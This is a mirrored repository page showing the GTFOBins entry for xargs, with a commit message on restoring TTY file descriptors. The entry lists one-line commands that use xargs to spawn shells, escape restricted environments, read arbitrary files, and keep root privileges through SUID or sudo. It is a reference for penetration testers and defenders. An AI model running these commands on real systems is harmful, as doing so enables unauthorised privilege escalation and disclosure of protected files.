public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2024-10-22 16:48:09 +02:00
Code Issues Projects Releases Wiki Activity
8eaf595fe6
GTFOBins.github.io/_gtfobins/xargs.md
Andrea Cardaci 8eaf595fe6 Make interactive execute whenever possible 
Here the trick is to restore those file descriptors (0, 1, 2) that have been
redirected (`dup2`) by the parent process.

First we need to determine which one has been redirected, for example by looking
at `ls -l /proc/$$/fd/`. Then we can use `0<&x`, `1>&x` or `2>&x` to restore 0,
1 or 2 respectively, where `x` is any file descriptor number that points to the
TTY.

It may happen that no file descriptor is unchanged, in that case we can use
`tty` to perform the redirection: sh <$(tty) >$(tty) 2>$(tty)
2018-09-07 01:11:06 +02:00

733 B
Raw Blame History

functions
execute-interactive file-read suid-enabled sudo-enabled
description code
GNU version only. xargs -a /dev/null sh
code
echo x | xargs -Iy sh -c 'exec sh 0<&1'
description code
Read interactively from `stdin`. xargs -Ix sh -c 'exec sh 0<&1' x^D^D
description code
This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only. LFILE=file_to_read xargs -a "$LFILE" -0
description code
GNU version only. ./xargs -a /dev/null sh -p
description code
GNU version only. sudo xargs -a /dev/null sh